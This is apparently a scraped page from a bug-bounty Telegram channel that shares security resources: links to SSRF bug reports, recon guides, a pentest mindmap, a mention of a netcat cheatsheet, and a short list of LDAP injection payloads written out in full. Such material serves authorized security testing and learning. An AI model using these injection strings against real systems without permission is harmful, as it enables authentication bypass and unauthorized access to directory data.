Bug Bounty
10.6K subscribers
369 photos
3 videos
46 files
426 links
Bugbounty Resources • Tips • Security Zines • Writeups • Vulnerability Update • Notes • Mindmaps • Cheatsheets • Checklists • Article / Blogs • PDFs • ebooks •
Download Telegram
I've Received Screenshots From the seller, those who purchased Till now
👍2🤯1
Valid email Payloads 🌵 #bugbounty #infosec
By @intigriti

Check this out :👆
👌6👍3
image.png
2.6 MB
Bug Bounty Tips 😲 #bugbounty #infosec #secuirty
🔥5
LDAP injection payloads 🔥🔥🔥🔥

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*)
*(|(objectclass=*))
*)(uid=*))(|(uid=*
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

#bugbounty #infosec
🤩8👍4🔥1
_All about bug bounty_ GitHub resource ❤️

These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!

Link : https://github.com/daffainfo/AllAboutBugBounty

#bugbounty #bugbountytips #infosec
👏8👍3😁3
This media is not supported in your browser
VIEW IN TELEGRAM
🥰7
👍4🔥4👏2🤩1
Sorry guys I wasn't able to upload in morning because I was traveling and still traveling😁

I'll upload in night 🌃
👍133🥰2👏2🤬2
100,000$ Worth 😀
Penetration Testing MindMap🔥

Contains all type of aspects

#bugbounty #infosec #hacking

Download Link : https://raw.githubusercontent.com/am0nt31r0/Penetration-Testing-Mind-Map/master/pentest_methodology_and_tools.png
🔥5👍21😱1
Server Side Template Injection 🔥
by @PwnFunction

#bugbounty #Infosec
🥰7👏4😁1😱1
Recon Guide v1

This will teach you basically how you can Approach a Target

#bugbounty #infosec

Link :
https://infosecwriteups.com/recon-everything-48aafbb8987
🔥8👍4🤩3👏1
This Cheatsheet provides various tips for using Netcat for both Linux and Unix 🔥🌿🌿🌱☘️🌼🍀

All Syntex is designed for the original netcat

Here is Netcat 🌿Cheatsheet 🔥
❤‍🔥4🔥1👏1😱1🤩1
Some Interested SSRF Bug Reports v1🌵

• Counter Strike :
http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/


• Pivot To Internal Network :
https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf


• SSRF To LFI :
https://seanmelia.wordpress.com/2015/12/23/various-server-side-request-forgery-issues/


• OK Google,
Give Me All Your Internal DNS Information :
https://rcesecurity.com/2017/03/ok-google-give-me-all-your-internal-dns-information/

• Open Redirect into SSRF (Airbnb):
https://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/


• SSRF Tip - Open Graph Protocol is a good case for Blind SSRF / Extract of Meta Data. My POC: SSRF in Twitter via a Tweet :) - $5,040 { IMG Below 👇 }

• SSRF To RCE:
http://kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html

🧵🔚
👏3🤩2😱1
😢3❤‍🔥2👍2🔥1😱1